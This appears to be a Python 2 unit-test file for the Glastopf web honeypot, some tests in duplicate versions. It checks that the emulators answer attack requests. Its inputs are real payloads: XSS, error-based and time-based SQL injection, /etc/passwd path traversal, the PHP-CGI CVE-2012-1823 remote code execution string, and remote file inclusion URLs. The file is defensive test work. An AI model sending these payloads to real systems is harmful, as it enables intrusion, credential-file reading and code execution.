def test_unknown_emulator(self): """Objective: Emulator testing for non-malicious requests. Input: http://localhost:8080/ Expected Result: One of the generated attack surfaces. Notes:""" os.mkdir(os.path.join(self.data_dir, 'dork_pages')) tmp_file = os.path.join(self.data_dir, 'dork_pages', format(str(uuid.uuid4()))) with open(tmp_file, 'w+') as f: f.write("tmpfile") print "Starting 'unknown' request emulation module" self.event.parsed_request = util.HTTPRequest() self.event.parsed_request.url = "/" self.event.matched_pattern = "unknown" self.event.response = "" self.event.source_addr = ("127.0.0.1", "8080") request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) print "Sending request:", "http://localhost:8080/" emulator.handle(self.event) remote_hash = hashlib.md5(self.event.response).hexdigest() local_hash = hashlib.md5(emulator.template).hexdigest() print "Hash of the local 'response' file:", local_hash self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched a generated attack surface item."
def test_unknown_emulator(self): """Objective: Emulator testing for non-malicious requests. Input: http://localhost:8080/ Expected Result: One of the generated attack surfaces. Notes:""" tmp_file = os.path.join(self.data_dir, 'dork_pages', format(str(uuid.uuid4()))) with open(tmp_file, 'w+') as f: f.write("tmpfile") print "Starting 'unknown' request emulation module" event = attack.AttackEvent() event.http_request = HTTPHandler('', None) event.matched_pattern = "unknown" event.http_request.path = "/" event.source_ip = "127.0.0.1" event.source_port = "8080" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080/" emulator.handle(event) remote_hash = hashlib.md5(event.http_request.get_response_body()).hexdigest() local_hash = hashlib.md5(emulator.template).hexdigest() print "Hash of the local 'response' file:", local_hash self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched a generated attack surface item."
def test_sqli_xss(self): """Objective: Injecting JavaScript. Input: '<script>alert("XSS");</script>' Expected Results: MySQL syntax error message containing '<script>alert("XSS");</script>' Notes: The query and identifying string is included in the error message.""" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = {"q": ['<script>alert("XSS");</script>']} self._get_test_request(self.event) emulator.handle(self.event) self.assertTrue('<script>alert("XSS");</script>' in self.event.http_request.get_response())
def test_sqli_lexer(self): """Objective: Tests the SQL injection lexer. Input: 'SELECT A FROM B' Expected Results: Notes: """ self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self._get_test_request(self.event) emulator.handle(self.event) self.assertEqual(emulator.ret["fingerprint"], "Enkn")
def test_sqli_emulator(self): """Objective: Assure that the SQL injection module is integrated. Input: Inject 'SELECT a FROM b' in parameter q. Expected Results: MySQL error message. Notes: As there is no table b, the honeypot returns an error message.""" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self._get_test_request(self.event) emulator.handle(self.event) response = "Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your " \ "MySQL server version for the right syntax to use near 'SELECT A FROM B' at line 1" self.assertEqual(self.event.http_request.get_response(), response)
def test_sqli_select_user(self): """Objective: A query with the goal to disclosure the current user. Input: SELECT user(). Expected Results: Current SQL user name. Notes: This query is MySQL specific.""" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = {"q": ["SELECT user()"]} self._get_test_request(self.event) emulator.handle(self.event) response = "root@localhost" self.assertEqual(self.event.http_request.get_response().strip(), response)
def test_sqli_mysqld_version(self): """Objective: A query with the goal to disclose the MySQL server version. Input: SELECT @@version. Expected Results: The MySQL server version number. Notes: The query is MySQL specific.""" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = {"q": ["SELECT @@version"]} self._get_test_request(self.event) emulator.handle(self.event) response = "5.1.49-3" self.assertEqual(self.event.http_request.get_response().strip(), response)
def test_phpinfo_emulator(self): """Objective: Emulator testing for phpinfo.php requests Input: http://localhost/phpinfo.php Expected Result: Result of the phpinfo() function Notes:""" self.event.parsed_request = util.HTTPRequest() self.event.parsed_request.method = 'GET' self.event.parsed_request.url = "/info.php?param1" self.event.matched_pattern = "phpinfo" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) emulator.handle(self.event) self.assertTrue("PHP Version " in self.event.response) self.assertTrue("Zend Extension" in self.event.response)
def test_phpcgi_source_code_disclosure_emulator(self): """Objective: Emulator testing for PHP CGI source code disclosure CVE-2012-1823 Input: http://localhost:8080/index.php?-s Expected Result: Source code disclosure Notes:""" event = attack.AttackEvent() event.http_request = HTTPHandler('GET /index.php?-s HTTP/1.0', None) event.matched_pattern = "php_cgi_rce" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) emulator.handle(event) self.assertEquals(event.http_request.get_response(), """<code><span style="color: #000000"> <span style="color: #0000BB"><?php<br />page </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'page'</span><span style="color: #007700">];<br />include(</span><span style="color: #0000BB">page</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?><br /></span> </span>""")
def test_dummy_emulator(self): """Objective: Tests the dummy emulator added to prove extensibility. Input: http://localhost:8080/ Expected Results: Returns a short message for verification. Notes: The dummy emulator fulfills minimal emulator requirements.""" print "Starting Dummy emulator module test" self.event.matched_pattern = "dummy" print "Loading module" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) print "Trying to handle an event with the dummy module" emulator.handle(self.event) self.assertEqual(self.event.response, "dummy response") print "Return value: '" + self.event.response + "'", print "equates our expectation."
def test_sqli_error_based(self): """Objective: A simple query provoking an error message from the database. Input: Inject a single quotation mark in parameter q. Expected Results: MySQL syntax error message. Notes: The query is included in the error message.""" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = {"q": ["'"]} self._get_test_request(self.event) emulator.handle(self.event) response = ( "Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your " "MySQL server version for the right syntax to use near ''' at line 1" ) self.assertEqual(self.event.http_request.get_response(), response)
def test_phpinfo_emulator(self): """Objective: Emulator testing for phpinfo.php requests Input: http://localhost/phpinfo.php Expected Result: Result of the phpinfo() function Notes:""" event = attack.AttackEvent() event.http_request = HTTPHandler('GET /info.php?param1 HTTP/1.0', None) event.matched_pattern = "phpinfo" #self.event.http_request.method = 'GET' #self.event.http_request.url = "/info.php?param1" event.matched_pattern = "phpinfo" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) emulator.handle(event) self.assertTrue("PHP Version " in event.http_request.get_response()) self.assertTrue("Zend Extension" in event.http_request.get_response())
def test_phpcgi_source_code_disclosure_emulator(self): """Objective: Emulator testing for PHP CGI source code disclosure CVE-2012-1823 Input: http://localhost:8080/index.php?-s Expected Result: Source code disclosure Notes:""" self.event.parsed_request = util.HTTPRequest() self.event.parsed_request.url = "/index.php" self.event.parsed_request.parameters = "-s" self.event.matched_pattern = "php_cgi_rce" self.event.response = "" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) emulator.handle(self.event) self.assertEquals(self.event.response, """<code><span style="color: #000000"> <span style="color: #0000BB"><?php<br />page </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'page'</span><span style="color: #007700">];<br />include(</span><span style="color: #0000BB">page</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?><br /></span> </span>""")
def test_sqli_emulator(self): """Objective: Assure that the SQL injection module is integrated. Input: Inject 'SELECT a FROM b' in parameter q. Expected Results: MySQL error message. Notes: As there is no table b, the honeypot returns an error message.""" print "Starting SQL injection module integration test..." self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) #print self.event.response response = "Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT A FROM B' at line 1" self.assertEqual(self.event.response, response) print "Return value: Invalid query: You have an error in your SQL syntax; (truncated)", print "equates our expectation."
def test_phpcgi_rce_emulator(self): """Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823 Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?> Expected Result: Remote command execution of a echo command Notes:""" GlastopfHoneypot.prepare_sandbox(self.work_dir) os.mkdir(os.path.join(self.data_dir, 'files/')) request = "POST /index.php?-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input HTTP/1.0\r\n\r\n" \ '<?php echo "testing"; ?>' event = attack.AttackEvent() event.http_request = HTTPHandler(request, None) event.matched_pattern = "php_cgi_rce" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) emulator.handle(event) print "Return value:", event.http_request.get_response() self.assertTrue("""testing""" == event.http_request.get_response())
def test_sqli_parser(self): """Objective: Tests the SQL injection parser. Input: 'SELECT A FROM B' Expected Results: Parsed tokens (SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B)))) Notes: The Parser turns the tokens into a query""" print "Starting SQL injection Parser test..." self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) self.assertEqual(emulator.query_parser.tree, '(SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B))))') print "Return value: Parsed tokens:", print '(SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B))))', print "equates our expectation."
def test_rfi_emulator_with_malformed_uri(self): # TODO: Handle return value from sandbox """Objective: Remote File Injection test with malformed uri Input: http://localhost:8080/test.php?p="http://google.com/index.html Expected Result: The return value from the PHP sandbox. Notes: Injected file contains <?php echo("test successful"); ?>""" GlastopfHoneypot.prepare_sandbox(self.work_dir) print "Starting remote file inclusion test" event = attack.AttackEvent() event.http_request = HTTPHandler('GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0', None) event.matched_pattern = "rfi" helpers.create_sandbox(self.data_dir) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080" + event.http_request.path emulator.handle(event) self.assertEqual(event.http_request.get_response(), "test successful") print "Return value 'test successful', matching our expectation."
def test_sqli_lexer(self): """Objective: Tests the SQL injection lexer. Input: 'SELECT A FROM B' Expected Results: Query tokens 121, 237, 80, 237, 122, 237, 80 Notes: 121 matches the SELECT, 237 the three white spaces, 80 the column and table alias and 122 the FROM""" print "Starting SQL injection Lexer test..." self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) #print self.event.response self.assertEqual(emulator.query_parser.tokens, [121, 237, 80, 237, 122, 237, 80]) print "Return value: Query tokens:", print "'" + ', '.join([str(t) for t in emulator.query_parser.tokens]) + "'", print "equates our expectation."
def test_phpcgi_rce_emulator(self): """Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823 Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?> Expected Result: Remote command execution of a echo command Notes:""" GlastopfHoneypot.prepare_sandbox(self.work_dir) os.mkdir(os.path.join(self.data_dir, 'files/')) self.event.parsed_request = util.HTTPRequest() self.event.parsed_request.method = 'POST' self.event.parsed_request.url = "/index.php" self.event.parsed_request.parameters = "-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input" self.event.matched_pattern = "php_cgi_rce" self.event.parsed_request.body = '<?php echo "testing"; ?>' request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) emulator.handle(self.event) print "Return value:", self.event.response self.assertTrue("""testing""" == self.event.response)
def test_rfi_emulator(self): # TODO: Handle return value from sandbox """Objective: Remote File Injection test. Input: http://localhost:8080/test.php?p=http://google.com/index.html Expected Result: The return value from the PHP sandbox. Notes: Injected file contains <?php echo("test successful"); ?>""" GlastopfHoneypot.prepare_sandbox(self.work_dir) print "Starting remote file inclusion test" self.event.parsed_request = util.HTTPRequest() self.event.parsed_request.url = "/test.php?p=http://1durch0.de/test_file.txt" print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url self.event.matched_pattern = "rfi" self.event.response = "" helpers.create_sandbox(self.data_dir) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) emulator.handle(self.event) self.assertEqual(self.event.response, "test successful") print "Return value 'test successful', matching our expectation."
def test_sqli_xss(self): """Objective: Injecting JavaScript. Input: '<script>alert("XSS");</script>' Expected Results: MySQL syntax error message containing '<script>alert("XSS");</script>' Notes: The query and identifying string is included in the error message.""" print "Starting error based JavaScript injection test" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = { 'q': ['<script>alert("XSS");</script>'], } self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) #print self.event.response self.assertTrue('<script>alert("XSS");</script>' in self.event.http_request.get_response()) print "Return value: ", self.event.http_request.get_response(), print "equates our expectation."
def test_error_based_concatenated(self): """Objective: Complex error based vulnerability probing request containing CONCAT. Input: ') AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673' Expected Results: MySQL syntax error message containing ':ngj:1:otc:0' (the result from the CONCAT call) Notes: The query and identifying string is included in the error message.""" print "Starting error based SQLMap injection test" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = { "q": [") AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673"], } self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) #print self.event.response self.assertTrue(':ngj:1:otc:0' in self.event.http_request.get_response()) print "Return value: ", self.event.http_request.get_response(), print "equates our expectation."
def test_put_method(self): """Objective: Test handling of a PUT requests Input: curl -XPUT http://localhost/ Expected Result: request verb is PUT, matcher pattern is put Notes:""" event = attack.AttackEvent() event.http_request = HTTPHandler('PUT / HTTP/1.0', None) self.assertTrue(event.http_request.request_verb == "PUT") method_handlers = method_handler.HTTPMethods(self.data_dir) event.matched_pattern = getattr( method_handlers, event.http_request.command, method_handlers.GET )(event.http_request) self.assertTrue(event.matched_pattern == 'put') request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) emulator.handle(event) self.assertTrue('Created' in event.http_request.get_response())
def test_rfi_emulator_with_malformed_uri(self): # TODO: Handle return value from sandbox """Objective: Remote File Injection test with malformed uri Input: http://localhost:8080/test.php?p="http://google.com/index.html Expected Result: The return value from the PHP sandbox. Notes: Injected file contains <?php echo("test successful"); ?>""" GlastopfHoneypot.prepare_sandbox(self.work_dir) print "Starting remote file inclusion test" event = attack.AttackEvent() url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt" event.http_request = HTTPHandler('GET /test.php?p={} HTTP/1.0'.format(url), None) event.matched_pattern = "rfi" helpers.create_sandbox(self.data_dir) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080" + event.http_request.path emulator.handle(event) self.assertEqual(event.http_request.get_response(), "test successful") print "Return value 'test successful', matching our expectation."
def test_pma_emulator(self): """Objective: Testing an emulator for PHPMyAdmin specific attacks. Input: http://localhost:8080/phpmyadmin Expected Result: The PHPMyAdmin set-up page. Notes: This module is for a specific attack against PHPMyAdmin""" with open(os.path.join(self.data_dir, 'phpmyadmin/script_setup.php'), 'r') as setup_php: page = setup_php.read() local_hash = hashlib.md5(page).hexdigest() print "Hash of the local 'script' file:", local_hash self.event.matched_pattern = "phpmyadmin" self.event.response = "" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) print "Sending request:", "http://localhost:8080/phpmyadmin/setup.php" emulator.handle(self.event) remote_hash = hashlib.md5(emulator.page).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched the hash of the local file."
def test_style_css_emulator(self): """Objective: Test the style.css emulator. Input: http://localhost:8080/styles.css Expected Result: The styles.css file. Notes: Definitions used for the attacks surface style parameters.""" print "Starting style.css emulator test" with open(os.path.join(self.data_dir, 'style/style.css'), 'r') as style_file: style = style_file.read() local_hash = hashlib.md5(style).hexdigest() print "Hash of the local 'style' file:", local_hash self.event.matched_pattern = "style_css" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) print "Sending request:", "http://localhost:8080/style.css" emulator.handle(self.event) remote_hash = hashlib.md5(self.event.response).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched content of style.css."
def test_robots_emulator(self): """Objective: Test the robots.txt emulator. Input: http://localhost:8080/robots.txt Expected Response: The robots.txt page. Notes: The robots.txt is provided by the honeypot""" print "Starting robot.txt request handling module" with open(os.path.join(self.data_dir, 'robots/robots.txt'), 'r') as robots_file: robots = robots_file.read() local_hash = hashlib.md5(robots).hexdigest() print "Hash of the local 'robots' file:", local_hash self.event.matched_pattern = "robots" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) print "Sending request:", "http://localhost:8080/robots.txt" emulator.handle(self.event) remote_hash = hashlib.md5(self.event.response).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched content of robots.txt."
def test_lfi_emulator(self): """Objective: Local File Inclusion module testing. Input: http://localhost:8080/test.php?p=../../../../../etc/passwd Expected Result: The passwd file from the virtual file system. Notes:""" print "Starting local file inclusion test" event = attack.AttackEvent() event.matched_pattern = "lfi" event.http_request = HTTPHandler('', None) event.http_request.request_url = "/test.php?p=../../../../../etc/passwd" print "Sending request:", "http://localhost:8080" + event.http_request.request_url print "Loading the emulator and handling the request." request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) emulator.handle(event) #TODO: Check it contains user names... response = event.http_request.get_response() self.assertIn('root:x:0:0:root:/root:/bin/bash', response) self.assertIn('daemon:x:1:1:daemon:/usr/sbin:/bin/sh', response)
def test_sqli_mysqld_version(self): """Objective: A query with the goal to disclose the MySQL server version. Input: SELECT @@version. Expected Results: The MySQL server version number. Notes: The query is MySQL specific.""" print "Starting mysqld version disclosure test" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = { "q": ["SELECT @@version"], } self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) #print self.event.response response = "5.1.49-3" self.assertEqual(self.event.http_request.get_response().strip(), response) print "Return value: ", response, print "equates our expectation."
def test_sqli_select_user(self): """Objective: A query with the goal to disclosure the current user. Input: SELECT user(). Expected Results: Current SQL user name. Notes: This query is MySQL specific.""" print "Starting SQL user disclosure test" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = { "q": ["SELECT user()"], } self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) #print self.event.response response = "root@localhost" self.assertEqual(self.event.http_request.get_response().strip(), response) print "Return value: ", response, print "equates our expectation."
def test_robots_emulator(self): """Objective: Test the robots.txt emulator. Input: http://localhost:8080/robots.txt Expected Response: The robots.txt page. Notes: The robots.txt is provided by the honeypot""" print "Starting robot.txt request handling module" with open(os.path.join(self.data_dir, 'robots/robots.txt'), 'r') as robots_file: robots = robots_file.read() local_hash = hashlib.md5(robots).hexdigest() print "Hash of the local 'robots' file:", local_hash event = attack.AttackEvent() event.http_request = HTTPHandler('GET /robots.txt HTTP/1.0', None) event.matched_pattern = "robots" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080/robots.txt" emulator.handle(event) remote_hash = hashlib.md5(event.http_request.get_response()).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched content of robots.txt."
def test_style_css_emulator(self): """Objective: Test the style.css emulator. Input: http://localhost:8080/styles.css Expected Result: The styles.css file. Notes: Definitions used for the attacks surface style parameters.""" print "Starting style.css emulator test" with open(os.path.join(self.data_dir, 'style/style.css'), 'r') as style_file: style = style_file.read() local_hash = hashlib.md5(style).hexdigest() print "Hash of the local 'style' file:", local_hash event = attack.AttackEvent() event.http_request = HTTPHandler('', None) event.matched_pattern = "style_css" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080/style.css" emulator.handle(event) remote_hash = hashlib.md5(event.http_request.get_response_body()).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched content of style.css."
def test_pma_emulator(self): """Objective: Testing an emulator for PHPMyAdmin specific attacks. Input: http://localhost:8080/phpmyadmin Expected Result: The PHPMyAdmin set-up page. Notes: This module is for a specific attack against PHPMyAdmin""" with open(os.path.join(self.data_dir, 'phpmyadmin/script_setup.php'), 'r') as setup_php: page = setup_php.read() local_hash = hashlib.md5(page).hexdigest() print "Hash of the local 'script' file:", local_hash event = attack.AttackEvent() event.matched_pattern = "phpmyadmin" event.http_request = HTTPHandler('', None) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080/phpmyadmin/setup.php" emulator.handle(event) remote_hash = hashlib.md5(emulator.page).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched the hash of the local file."
def test_error_based_concatenated(self): """Objective: Complex error based vulnerability probing request containing CONCAT. Input: ') AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673' Expected Results: MySQL syntax error message containing ':ngj:1:otc:0' (the result from the CONCAT call) Notes: The query and identifying string is included in the error message.""" print "Starting error based SQLMap injection test" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = { "q": [ ") AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673" ], } self._get_test_request(self.event) print "Sending request:", self.test_request emulator.handle(self.event) #print self.event.response self.assertTrue( ':ngj:1:otc:0' in self.event.http_request.get_response()) print "Return value: ", self.event.http_request.get_response(), print "equates our expectation."
def test_obfuscated_blind_sqli(self): """Objective: Injecting an obfuscated response delaying SQL query. Input: ')%20aND%20SLeeP(1)%20And%20(4673%3D4673' Expected Results: Response is delayed by 1 second Notes: """ print "Starting obfuscated time based injection test" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.parsed_request.parameters_dict = { "q": ")%20aND%20SLeeP(1)%20And%20(4673%3D4673", } self._get_test_request(self.event) print "Noting time and sending request:", self.test_request start = datetime.datetime.now() emulator.handle(self.event) #print self.event.response end = datetime.datetime.now() duration = end - start self.assertTrue(duration.seconds >= 1) print "Response duration: ", duration, print "equates our expectation."
def test_favicon_emulator(self): # TODO: Handle existing favicon """Objective: Test the favicon.ico handling module. Input: http://localhost:8080/favicon.ico Expected Result: Returns a favicon for the browser if available. Notes: Providing a unique favicon could improve the deception.""" print "Starting favicon module test" self.event.matched_pattern = "favicon_ico" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) print "Sending request to the module: http://localhost:8080/favicon.ico" self.event.parsed_request.url = "/favicon.ico" emulator.handle(self.event) with open(os.path.join(self.original_data_dir, 'favicon/favicon.ico'), 'r') as favicon: data = favicon.read() local_hash = hashlib.md5(data).hexdigest() print "Calculate md5 hash from local favicon file:", local_hash remote_hash = hashlib.md5( self.event.response.split('\r\n\r\n')[1]).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value", remote_hash, print "matched expectation."
def test_blind_sqli(self): """Objective: Injecting a response delaying SQL query. Input: ') AND SLEEP(1) AND (4673=4673' Expected Results: Response is delayed by 1 second Notes: """ print "Starting time based injection test" self.event.matched_pattern = "sqli" request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) self.event.http_request.request_query = { "q": [ ") AND SLEEP(1) AND (4673=4673", ], } self._get_test_request(self.event) print "Noting time and sending request:", self.test_request start = datetime.datetime.now() emulator.handle(self.event) #print self.event.response end = datetime.datetime.now() duration = end - start self.assertTrue(duration.seconds >= 1) print "Response duration: ", duration, print "equates our expectation."
def test_lfi_emulator(self): """Objective: Local File Inclusion module testing. Input: http://localhost:8080/test.php?p=../../../../../etc/passwd Expected Result: The passwd file from the virtual file system. Notes:""" print "Starting local file inclusion test" with open(os.path.join(self.data_dir, "virtualdocs/linux/etc/passwd"), 'r') as passwd_file: passwd = passwd_file.read() local_hash = hashlib.md5(passwd).hexdigest() print "Hash of the local 'passwd' file:", local_hash self.event.parsed_request = util.HTTPRequest() self.event.parsed_request.url = "/test.php?p=../../../../../etc/passwd" print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url self.event.matched_pattern = "lfi" self.event.response = "" print "Loading the emulator and handling the request." request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) emulator.handle(self.event) remote_hash = hashlib.md5(self.event.response).hexdigest() self.assertEqual(remote_hash, local_hash) print "Return value:", remote_hash print "matched the hash of the local file."